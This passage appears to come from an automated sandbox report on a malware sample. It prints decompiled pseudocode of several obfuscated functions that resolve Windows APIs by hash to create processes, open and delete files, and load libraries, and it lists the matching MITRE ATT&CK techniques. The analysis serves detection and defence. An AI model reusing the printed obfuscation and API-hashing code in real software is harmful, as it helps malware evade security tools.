Instruction Fuzzy Hash: FE1159B5D00209EFDF58DFA4C8498DEBBB4EB40324F108299E824B6290D3B55B058F91

Uniqueness

Uniqueness Score: -1.00%

Function 003346E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E003346E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00329E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0033BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x003346e8
0x003346ed
0x003346ef
0x003346f2
0x003346f5
0x003346f8
0x003346f9
0x003346fc
0x003346ff
0x00334702
0x00334703
0x00334706
0x00334709
0x0033470c
0x0033470d
0x00334710
0x00334713
0x00334716
0x00334717
0x00334719
0x0033471e
0x00334727
0x0033472e
0x00334732
0x00334739
0x00334740
0x00334747
0x0033474e
0x00334755
0x0033475c
0x00334763
0x0033476a
0x00334771
0x0033477d
0x00334783
0x00334786
0x0033478d
0x003347ae
0x003347ca
0x003347d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 003347CA

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: b095d9b4eb73f311966eadec223554120ce218114fbbe43249898cfea6209a97
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: 7E31E272900248BBDF559F95DD09CDEBF76FB89314F008188FA2466160D7B69A60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0032F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0032F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00329E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0033BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x0032f1e5
0x0032f1ea
0x0032f1f5
0x0032f1fa
0x0032f203
0x0032f20a
0x0032f20d
0x0032f210
0x0032f217
0x0032f21b
0x0032f21f
0x0032f226
0x0032f22d
0x0032f23a
0x0032f23e
0x0032f241
0x0032f245
0x0032f24c
0x0032f253
0x0032f25a
0x0032f25e
0x0032f265
0x0032f276
0x0032f279
0x0032f27d
0x0032f284
0x0032f2a3
0x0032f2b0
0x0032f2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0032F2B0

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: ba1949f9ab9b0dd595ffd89bd092ce99a5a99fd0020afb06b960fd4f0d79466d
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: 812155B5D0121DAFDB09DFA5C88A8EEFBB4FB44708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0033BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0033BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00329E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E0033BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x0033bf24
0x0033bf29
0x0033bf2b
0x0033bf2e
0x0033bf2f
0x0033bf30
0x0033bf33
0x0033bf36
0x0033bf39
0x0033bf3c
0x0033bf3f
0x0033bf42
0x0033bf43
0x0033bf44
0x0033bf49
0x0033bf53
0x0033bf5a
0x0033bf61
0x0033bf68
0x0033bf6c
0x0033bf70
0x0033bf77
0x0033bf7e
0x0033bf85
0x0033bf9c
0x0033bfa4
0x0033bfab
0x0033bfb2
0x0033bfb6
0x0033bfba
0x0033bfbe
0x0033bfd1
0x0033bfe8
0x0033bfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0033BFE8

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: d8dffc54a85709f202cf596f634a4233d35b0a54dbdde6db8979545180b84ba1
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: 2C21D47680020DBBCF15DF96D9498DFBFB5FB84748F108198F925A6220D3B68A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00331B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00331B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00329E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E0033BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x00331b2a
0x00331b2d
0x00331b2f
0x00331b31
0x00331b34
0x00331b37
0x00331b3a
0x00331b3b
0x00331b3c
0x00331b41
0x00331b50
0x00331b54
0x00331b61
0x00331b64
0x00331b6b
0x00331b72
0x00331b79
0x00331b7d
0x00331b84
0x00331b8b
0x00331b92
0x00331b99
0x00331ba0
0x00331ba7
0x00331bae
0x00331bc2
0x00331bc5
0x00331bd8
0x00331be5
0x00331bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00331BE5

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: 5a9ecbfa15e6b81118e8754ed7462d97a220fac5c3af51d245afa2670bd635ed
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: D12132B5D00208FBDF05DFA5C94A8EEBBB5FB80314F108089E914AA261D3B45B41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 003366C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003366C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E00329E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E0033BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

0x003366cf
0x003366e4
0x003366e9
0x003366f3
0x003366f7
0x003366fe
0x00336705
0x0033670c
0x00336710
0x00336717
0x0033671e
0x00336725
0x00336729
0x0033672d
0x00336734
0x0033673b
0x00336742
0x00336766
0x00336777
0x0033677e

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00336777

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 9bad1b385492ee8ea4a3ec7035901216ea00306325a6724c54f0632e7a4e55db
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 801142B2800218FBCF15DFA5CC0A8DEBFB8EF85304F108198E92966210D3B18A64DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0032FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0032FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E00329E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0033BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x0032fcbc
0x0032fcbf
0x0032fcc1
0x0032fcc3
0x0032fcc8
0x0032fcd6
0x0032fcdb
0x0032fce0
0x0032fce7
0x0032fcee
0x0032fcf5
0x0032fcfc
0x0032fd03
0x0032fd0d
0x0032fd13
0x0032fd16
0x0032fd1d
0x0032fd24
0x0032fd2b
0x0032fd4f
0x0032fd58
0x0032fd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0032FD58

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: cd5a0d9c9a4345ffb6c9db2ef8da09ef7d05c0c1a1350398e94abdfe8a996385
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: 20112E71D00218EBDB18DFA5DC4A9EEBBB5EB44304F108189E429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 00329EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00329EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00329E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0033BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x00329eaf
0x00329eb2
0x00329eb4
0x00329eb8
0x00329eb9
0x00329ebe
0x00329ec8
0x00329ecf
0x00329ed6
0x00329edd
0x00329ee1
0x00329ee5
0x00329eec
0x00329ef3
0x00329efa
0x00329f01
0x00329f08
0x00329f0f
0x00329f16
0x00329f1d
0x00329f24
0x00329f48
0x00329f51
0x00329f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00329F51

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: efb6cef760ac98b7c979e588a97cec4d906e4e596aa9702eddd1972c56daed57
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: A01118B1C11619EBDF49DFA4D94A8DEBBB4EF10318F108288E825A6250E7B45B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 0032BA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0032BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0033BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x0032baa2
0x0032baa9
0x0032baad
0x0032bab4
0x0032babb
0x0032babf
0x0032bac6
0x0032bacd
0x0032bad4
0x0032badb
0x0032bae6
0x0032baee
0x0032baf6
0x0032bafa
0x0032bb12
0x0032bb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 0032BB1D

Memory Dump Source

Source File: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.762649794.0000000000320000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.762670866.0000000000344000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: e98043c886d6069c8941cce23b4448c792f96f71c890ffea0dfe590d66303108
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 0A0100B5D1120CEBCB08DFA8CA4A9DEBBB4FB04348F108699E821B7211D7B55B04CF81

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

